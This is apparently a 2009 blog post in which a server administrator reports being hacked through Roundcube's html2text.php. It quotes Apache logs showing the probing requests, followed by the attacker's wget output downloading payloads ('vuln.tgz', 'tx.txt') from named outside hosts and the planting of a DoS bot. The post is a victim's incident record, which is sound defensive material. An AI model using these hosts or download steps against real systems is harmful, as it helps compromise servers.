I hate getting hacked

Here is another posting of someone with the same problem

The vulnerability seems to have been in Roundcube, a web-based email program. The sad part is that I’m up-to-date on Debian patches on that.

Here is the relevant web log:

200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:48 -0600] "POST /rc/bin/html2text.php\r HTTP/1.0" 404 406 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT\
 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:48 -0600] "POST /mss2/bin/html2text.php\r HTTP/1.0" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows \
NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:49 -0600] "POST /mail/bin/html2text.php\r HTTP/1.0" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows \
NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:50 -0600] "POST /roundcubemail/bin/html2text.php\r HTTP/1.0" 404 417 "-" "Mozilla/4.0 (compatible; MSIE 7.0;\
 Windows NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:51 -0600] "POST /roundcube/bin/html2text.php\r HTTP/1.0" 200 123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Win\
dows NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:56 -0600] "POST /roundcube/bin/html2text.php\r HTTP/1.0" 200 229 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Win\
dows NT 5.1; InfoPath.2)"

And from the apache error log:


[Tue Mar 24 05:12:48 2009] [error] [client 200.206.141.156] File does not exist: /var/www/rc
[Tue Mar 24 05:12:48 2009] [error] [client 200.206.141.156] File does not exist: /var/www/mss2
[Tue Mar 24 05:12:49 2009] [error] [client 200.206.141.156] File does not exist: /var/www/mail
[Tue Mar 24 05:12:50 2009] [error] [client 200.206.141.156] File does not exist: /var/www/roundcubemail
—2009-03-24 05:12:56— http://loco.ucoz.com/vuln.tgz
Resolving loco.ucoz.com… 208.100.61.101
Connecting to loco.ucoz.com|208.100.61.101|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 210574 (206K) [application/octet-stream]
Saving to: `vuln.tgz’

0K ………. ………. ………. ………. ………. 24% 190K 1s 50K ………. ………. ………. ………. ………. 48% 655K 0s 100K ………. ………. ………. ………. ………. 72% 748K 0s 150K ………. ………. ………. ………. ………. 97% 732K 0s 200K ….. 100% 1012K=0.5s

2009-03-24 05:12:59 (428 KB/s) – `vuln.tgz’ saved [210574/210574]

./start.sh: line 1: /#bin/bash: No such file or directory

Here is an earlier, I think failed, attempt to get in, also in the apache error log. The 127.0.0.1 is worrysome:


[Mon Mar 23 18:00:02 2009] [error] [client 127.0.0.1] File does not exist: /var/www/usr
—2009-03-23 18:03:46— http://www.cr578.com/tx.txt
Resolving www.cr578.com… 61.151.239.81
Connecting to www.cr578.com|61.151.239.81|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 22823 (22K) [text/plain]
tx.txt: Permission denied

Cannot write to `tx.txt’ (Permission denied).
chmod: cannot access `tx.txt’: No such file or directory
Could not open input file: tx.txt

They installed software that started a denial of service attack. It was installed in /var/tmp/… (yes, three dots) and /var/tmp/bot. I noticed that a program named “std” (from /var/tmp/…/std) was using 42% of cpu.